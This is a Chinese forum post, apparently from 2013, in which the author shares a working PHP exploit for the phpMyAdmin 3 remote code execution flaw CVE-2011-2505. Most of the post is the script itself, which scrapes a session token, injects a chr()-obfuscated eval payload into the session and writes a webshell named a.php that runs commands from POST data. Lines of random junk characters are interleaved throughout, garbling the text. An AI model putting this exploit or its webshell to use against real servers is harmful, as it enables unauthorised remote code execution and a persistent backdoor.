最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
( P% b/ ~# n2 Z& Q* g# x* g: C7 ]0 L! ?$ M, B- k
昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
% w6 R( i0 W' X6 e: R8 _' c8 t* }. s0 S
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:9 ~4 r% L! v @( S
一是session.auto_start = 1;& Y* p4 y! ?! y8 _6 U& M
二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
: b! G4 E$ b5 [3 }; y当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
' h6 H4 ?9 X8 f: u$ q* d! F2 S6 m; w/ G v$ o' h
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。+ j; t/ J7 `4 _& h" Q
8 t; j& l1 d% r( i8 ?4 H; ~于是写了这个php版本的exp,代码如下:
l0 F. ^+ I# k8 ^7 t3 t, Q( @, }
#!/usr/bin/php
) Y& ~" t$ T' \* M8 L f5 G<?php
$ b; j1 }3 ]$ B+ v) \, g. o% U8 oprint_r('
8 C% `% j3 ]6 ]% \+---------------------------------------------------------------------------+) I' ]2 g( ^9 Y7 R7 C" S
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]9 q" H2 E& I- P& W' {1 ?+ K r& U
by oldjun(www.oldjun.com)
7 m N) s B0 `! Qwelcome to www.t00ls.net
" K! L+ ]. _" J" W! I9 ~8 Jmail: oldjun@gmail.com; a: c" b$ E5 X( O" d" |
Assigned CVE id: CVE-2011-2505
& L# i' k* ]8 W% ^4 l) F- e+---------------------------------------------------------------------------+: J7 I( L" v3 @9 Y: [
');3 l: q5 w( N. A; T+ k4 R5 T/ L
W" I6 S3 X; G# i: ]0 |/**
+ E6 ~4 z& \! }* T0 q" Q * working when the directory:"config" exists and is writeable.
( F3 C; U+ E$ O6 w8 R. U* j**/, J2 o- O( g1 R9 O8 F6 ?
0 m& @% g/ z5 r. d* H. T+ F
if ($argc < 3) {. D* B2 L# o' |8 n$ `
print_r('
0 j3 o9 | r, d1 z( L+ s+---------------------------------------------------------------------------+
" s$ f$ c7 z o, q6 xUsage: php '.$argv[0].' host path4 x! {+ \; R, z6 d0 Y4 T1 s9 Y
host: target server (ip/hostname)
$ W) l- {" s6 C# t2 C( Xpath: path to pma3
4 a, v0 s4 N2 F# @9 gExample:
! L" o& B! r& v, }! aphp '.$argv[0].' localhost /pma/
* U6 w; K) l( W+ b$ j' y% X+---------------------------------------------------------------------------+
" Q+ T+ q7 M- p5 ]& d- c7 t8 ?" p');6 k; R4 m% x+ v) R. X" f' S" _: \ Q
exit;* [ d- z' L& _% I$ r7 ^% S# e& F+ G) ~
}
( p( h+ k; L9 T7 E' f; W6 E( i& U- [5 k
$host = $argv[1];7 W* b8 R5 \( [7 L3 o/ \
$path = $argv[2];& y4 l' Y' i3 U3 q; r2 z9 n
2 T- V& J. E- w9 H% N3 [7 ~; q M7 `
/**
" N: o" T* n$ k% l; ` * Try to determine if the directory:"config" exists
! ?7 J; Y3 `5 ?) `5 m**/
; @/ Z3 P8 I' S1 fecho "[+] Try to determine if the directory:config exists....\n";
. J- y$ S$ ^6 g$returnstr=php_request('config/');
4 T8 ]% B) B+ d( c6 N e- Vif(strpos($returnstr,'404')){
: M, V7 w6 z5 U4 ~! H8 N j( Q% s exit("[-] Exploit Failed! The directory:config do not exists!\n");
% L6 w% y: A' T) f" ?* x}
/ k! D5 Z6 `6 F
2 Y8 Q# \) u' B% C/**
& a! c8 ]: f* m, d/ l4 d * Try to get token and sessionid
: a! E+ [/ n3 X6 v3 Z**/) A2 @- d, m% y' Q6 Q; e+ s
echo "[+] Try to get token and sessionid....\n";
. X p- F ?* n# _: D/ O, f$result=php_request('index.php');# p' y m/ C" m( t4 d' b3 C \
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);( p! k. E. k) X8 p) s1 ^0 V
$token=$resp[3];" Z7 ^! E; d' X; R1 ] X% `3 h0 _( n
$sessionid=$resp[1];9 h3 u' D2 s/ U0 c
if($token && $sessionid){
, }# G$ ]) `: K u N0 r3 S# b2 k echo "[+] token token\n";& a2 ~' N& h; s U* Q5 @: M+ ]
echo "[+] Session IDsessionid\n";' U4 R; u; ]9 ?5 T, D+ r
}else{
1 l5 a6 S5 }9 x exit("[-] Can't get token and Session ID,Exploit Failed!\n");% ? R& C2 I8 @* w; @. t
}
* u" w7 ?* | z* ~. g9 M6 E8 o1 y E: d3 Y, g
/**
k! D; E2 y, r( |6 l* ~2 ? * Try to insert shell into session, P: V" m% m' V2 z V3 M7 i
**/; J9 A7 W: g' ~
echo "[+] Try to insert shell into session....\n";
+ r+ C, \. i( f- L, Nphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.0 D/ S1 Y( {: e0 ~* R: P. Y
% r& L, K' i- y! Y0 h4 T- y0 Q5 b# F/**' X! |: x3 b. a$ D) `- z7 z
* Try to create webshell, V2 K/ P8 P, p$ p5 W4 _) o- y# G4 B% L
**/
" |1 M9 n) m! D p, w2 Y- Necho "[+] Try to create webshell....\n";
& v8 r. q- V1 b" E, Ophp_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
; y$ s ]( J2 p0 ]; E/ B# R5 p f! t/**' \: Y% p1 U; M0 @3 e* ^3 U3 J" f
* Try to check if the webshell was created successfully; W7 F5 D+ Q8 b# |
**/2 H1 N& q5 A* v# C
echo "[+] Try to check if the webshell was created successfully....\n";0 w( v" V3 ^4 N/ {4 M
$content=php_request('config/config.inc.php');
& Q; U9 c& I& q1 Eif(strpos($content,'t00ls')){
: [+ z; [ _, s/ f$ a$ A( c9 F echo "[+] Congratulations! Expoilt successfully....\n";
( y8 j2 f+ Y2 F$ V: I" C; s% _$ K0 C4 P echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";
. u# C8 G2 E* P( a; \}else{
9 p: i3 D' H+ V exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
* h) ~6 O$ w4 L9 w% m% x}5 ]6 h! @2 }: a; g/ P/ ^
. s+ m4 ~& I- O2 |7 x% i
function php_request($url,$data='',$cookie=''){8 r4 B8 O( R7 P% l
global $host, $path;! b9 b! v! m# r) K+ B6 X
6 u$ h! W' {( w; [; {7 c$ E $method=$data?'POST':'GET';
4 G# h/ z) f9 X5 B Z& c# X4 N ?2 R
& L$ J: k9 v, c# N5 H1 I $packet = $method." ".$path.$url." HTTP/1.1\r\n";0 w1 ? K" J" `3 T5 `
$packet .= "Accept: */*\r\n";
+ j9 D, d* D9 {% J! f $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";' d8 G9 ]5 B( R
$packet .= "Host: $host\r\n";6 s m6 K$ g, |
$packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
{9 s$ G( } ]6 v3 m. I $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
$ b( `; |" b S# i0 m $packet .= $cookie?"Cookie: $cookie\r\n":"";0 M* W* g+ x1 ?5 z; R
$packet .= "Connection: Close\r\n\r\n";. |/ d3 b% [/ D* l( s
$packet .= $data?$data:"";/ F/ I/ f: o* S( m
$ n& |1 ~4 s9 n4 O# m& u) z
$fp = fsockopen(gethostbyname($host), 80);
& G( b5 f/ S& G7 ]: X if (!$fp) {
- G) T5 x+ o: I echo 'No response from '.$host; die;
- r# w' E) t4 e }
; ]+ c% b& {6 S+ w$ S; { fputs($fp, $packet);
* I$ @9 k$ a% l" _
( U: L5 s0 a* E5 g7 x0 g: D a" U $resp = '';. H' S b1 v4 j6 k4 ] v
! @ ]# @5 a0 g9 B5 q9 ^6 N while ($fp && !feof($fp))
- D" n6 Z6 d+ }( R. ^( D $resp .= fread($fp, 1024);: F+ l- P; p1 U+ R3 J* X2 j+ j
4 a* u/ W% S" ?7 D return $resp;8 Y* Z0 @1 n& ^6 R
}
6 U+ E$ D' i4 g& a * i8 S) X) f# W9 q5 b5 \! i i
?>
* y. M: E! J( M. |
发表于 2013-2-21 09:13:03
收藏
支持
反对